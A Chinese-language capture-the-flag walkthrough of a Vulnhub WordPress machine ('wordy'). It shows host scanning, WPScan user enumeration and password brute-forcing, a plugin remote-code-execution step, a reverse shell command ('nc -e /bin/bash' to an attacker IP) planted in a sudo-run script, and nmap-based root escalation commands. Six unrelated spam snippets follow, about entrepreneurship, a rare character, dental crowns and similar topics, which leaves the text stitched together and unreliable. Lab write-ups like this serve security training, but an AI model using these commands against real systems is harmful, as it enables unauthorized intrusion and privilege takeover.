Vulnhub提示:
扫描靶机IP地址:nmap -sP 192.168.10.0/24
扫描端口信息:nmap -sV -p 1-65535 -A 192.168.10.129
开放端口22,80
访问80端口发现URL被重定向到wordy
我们需要在host文件中添加
文件位置 /etc/hosts
可以访问到啦
扫描下目录结构吧,
御剑扫描
发现是wordpress站点
使用WPscan扫描
一款专注于wordpress站点扫描工具
wpscan -url wordy
顺便枚举一下用户
站点没发现什么漏洞,暴力破解尝试下
root@kali:~# wpscan --url wordy --enumerate u -P /usr/share/wordlists/rockyou.txt
破解很久没获取密码,这时候想起Vulnhub重要提示
root@kali:~# cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
使用这个字典在尝试下暴力破解
root@kali:~# wpscan --url wordy --enumerate u -P /root/passwords.txt
获得密码
mark
helpdesk01
登录后台发现Activity on Wordy插件存在远程代码执行漏洞
利用远程代码执行命令漏洞步骤:
step1:打开burpsuite工具设置 ***
step2:
step3:发送到重写模块
step4:kali打开端口监听
step5:利用成功获取到webshell
横向移动搜寻可以利用的信息
成功找到了graham的密码信息
查看graham用户的sudo -l 权限,可以以jens 用户权限执行backups.sh脚本
如果以jens身份执行反弹shell脚本,反弹回的则是jens用户的shell
echo “ nc -e /bin/bash 192.168.10.155 8888 " > backups.sh
kali 端监听 8888 端口
sudo -u jens 以jens用户执行脚本,不加-u 则默认以root权限执行,那样当然是不能成功的
jens用户可以以 root权限执行 nmap nmap 提权分为两种
旧版本上以进入交互提权
# 进入nmap的交互模式 nmap --interactive # 执行sh,提权成功 !sh
新版本
echo 'os.execute("/bin/sh")' >/tmp/TF
sudo nmap --script=/tmp/TF
随着社会的进步,经济的不断提升,越来越多的人选择创业来改善生活条件。那么创业是简单的吗?并不是这样的,创业需要有足够的实力,首先要有洞察市场的敏锐之力。其次要有坚持不懈的决心。那么光有这些是不够的,还...
邸怎么读?邸是什么意思?邸的词语出处也是那里?很多人在生活、学习中遇到“邸”这个词,大家都不知道怎么读这个生僻字。你想知道这些有趣的生僻字怎么读吗?豪友网专门精心整理了生僻字怎么读相关的内容,为你释疑...
初入职场滑爽球提示:领导干部有最堂而皇之的十大谎话,谁信谁真蠢,比照一下,你信了是多少? 【1】在大家企业,职工第一,别人第二——许多 企业老总都是会公然树立自身,但你看一下她们盘剥职工,忽略...
男伴侣跑船去了,十个月回不来,看不到他了,上船之前他汇报我必定稳放心。 不会的,相信他,大概手机没电了,可能电话欠费了。想开点。再看看别人怎么说的。 一个汉子脚踩两只船,被检举了,当着两个...
我的门牙掉了,很是欠悦目,想去做牙齿修复几多,但是假如做烤瓷牙的话,要多。 烤瓷牙的材质有许多种,有金属烤瓷牙和钴铬烤瓷牙,美容冠烤瓷牙,全瓷烤瓷牙等等。差异材质的烤瓷牙价值不等,一般一颗门牙...
在日常生活中,燃气灶打不着火这样的故障,还是很常见的。造成打不着火的原因主要表现在,不能正常供燃气和燃气灶本身故障或设置两个方面。其中有些具体原因,我们自行就可以处理,有些则需要专业人员维修。今天,我...